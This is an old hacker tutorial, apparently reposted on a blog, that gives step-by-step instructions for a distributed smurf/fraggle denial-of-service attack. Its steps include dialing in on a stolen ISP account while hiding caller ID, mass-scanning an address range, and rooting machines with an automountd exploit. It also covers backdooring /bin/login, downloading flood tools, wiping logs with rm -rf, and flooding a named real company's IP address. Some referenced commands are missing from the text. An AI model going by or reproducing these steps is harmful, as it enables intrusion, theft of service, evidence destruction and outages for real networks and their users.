Old School DDoS Attacks - How Large Servers Got Pwned
/*
How Large Servers are Owned via DDoS
written by perator
*/
Every time you dial up to your ISP, your box is assigned an IP address. An IP address is a number (eg. 199.44.2.1) that identifies you on the internet. Every online computer has its own unless it’s on a LAN (Local Area Network) in which case it might share an IP address with several computers linked to a HUB (A network device that links computers together to form a network).
By sending “fragmented” packets to someone’s IP address, you can knock them offline, freeze, “blue screen” or even reboot someone’s computer, depending on the packet header and the remote computer’s tcp/ip stack’s buffer. This is called a DoS Attack (Denial of Service attack). We are not going to do this, as little buffer overflows like those only work on windows based operating systems. Since we’re usually dealing with Sun Sparc servers, routers, nodes, and Unix based systems, we’re going to use utilities which turn 200gbps of bandwidth into 0kbps. Most successful dos exploits are run from unix based systems, such as FreeBSD, OpenBSD, SunOS, System V, or Linux (I would recommend slackware). Now this paper is going to start to get technical.
Your first step is to obtain root access on several UNIX based systems. Root is the superuser on a UNIX system which has access to all socket layers so you can send IGMP data packets and very large ICMP data packets. To obtain several roots, you must first get a normal user shell to scan from. Lets assume you run a UNIX based system. You need to get a stolen ISP account and dial into it using *67. To do this, do ‘vi /etc/chatscripts/your-provider’ then where it says “ATDT555-5555″ edit that to “ATDT*67555-5555″.
Next, goto www.vetesgirl.com and download VeteScan. Decompress it:
[user@localhost]$ tar zxvf Vete*
Then compile it.
[user@localhost]$ ./configure ; make vete
You may have to download the libpcap libraries or networking programs such as netcat. Next, choose a class A ip range, such as 210. Now you do:
[user@localhost]$ ./massa 210 > 210 > /dev/null &
Then you come back in about 20 days and you should have a list of every online computer on the 210 class and vulnerabilities detected by your vulnerability scanner. If you do not have that kind of time, you can do this:
and wait a few minutes, but that will only scan around 200 systems, rather than 200,000. Now that you have this list, we’ll pick… the automountd exploit to use. Automountd is included with vetescan.
to see what it’s called, it could vary. The daemon is usually named /usr/sbin/portmap in your process list. This is so no one comes in behind you getting your bcast lists and code. Your next step is to backdoor this box. There are numerous ways to backdoor unix, i’ll list one of the easiest ways, /bin/login.
download bj.c from ftp.technotronic.com, or maybe i’ll have doomcloud put it on his site.
Go back to your 210.109.222 list and do the same thing to about 10 other boxes, but after you do /sbin/ifconfig to see how many interfaces, /sbin/route to view it’s kernel routing table, and /cat/cpuinfo, to make sure the processor is capable of handling mass packet flow. Hopefully, you will have hit a few oc3’s, oc12’s, oc48’s, which are pretty fast connections. The faster the root, the better.
You could even install a sniffer to own the rest of the boxes/routers on that network. Now do ‘lynx mixter.void.ru’, or ‘lynx hack.co.za’, to download papasmurf.c, smurf.c, and synk5.c, fraggle.c, a bcast scanner, and a log cleaner. exit lynx, and compress all these files into a tar. name it owned.tar.gz. Then ftp the tar into all 10 of your roots. Be sure to rm -rf /var/log/xferlog ; touch /var/log/xferlog when you’re done transfering to wipe the FTP logs. If you’re as paranoid as I am, you’ll even download a log cleaner that will automatically wipe /var/log/wtmp, /var/log/utmp, /var/log/messages, /var/log/secure, /var/log/syslog, and any other OS specific log locations.
Now that you have several oc3+ roots, necessary Distributed Denial of Service tools (smurf, papasmurf, fraggle), you now need to compile a HUGE list of broadcast ip addresses to relay packets from. This is what will kill your target. Grab a broadcast scanner from mixter.void.ru if you don’t already have one.
Note: You cannot just take down ebay.com by itsself because it’s NS records do not say “NS IN A 10.1.50.33″ which means ebay.com does not have an IP address.
However, we can take down www.ebay.com, or pages.ebay.com which are alised to the same ip, through which is 216.32.120.133 because the zone records say “www IN CNAME pages.ebay.com” and pages IN A 216.32.120.133″ So that’s the IP that we’re going to hit.
Now to the packeting. We’re going to use 7 virtual terminals in unix(console) or open up a gui (graphical user interface) and open several eterms/vterms/xterms and telnet to a differnet oc3 on all terminals. Then get your papasmurf commands ready.
(papa)smurf.c v5.0 by TFreak
usage: ./papasmurf [options]
Options
-p: Comma separated list of dest ports (default 7)
-r:: Use random dest ports
-R:: Use random src/dest ports
-s:: Source port (0 for random (default))
-P:: Protocols to use. Either icmp, udp or both
-S:: Packet size in bytes (default 64)
-f:: Filename containg packet data (not needed)
-n:: Num of packets to send (0 is continuous (default))
-d:: Delay inbetween packets (in ms) (default 10000)
Then you get on your virtual terminals and hit all at once using differnet bcast lists.
Excecute that command 15 times from each root using a different bcast list for each specific root. Be sure that the internet protocol you’re hitting actually resolves to your destination protocol. (nslookup ip ; dig @ip chaos) Given enough bandwidth and a few KILLER bcast lists, you can take down all of sprint, att, worldnet, gte, etc. If you hit large providers such as sprint, exodus, netsol, and uu, you’ve basically taken down most of the internet. But you can only keep it down for about 15 seconds, until your roots flood themselves out and your broadcast list’s routers shoot themselves.
Technology Made Simple
Here is the...
No comments yet.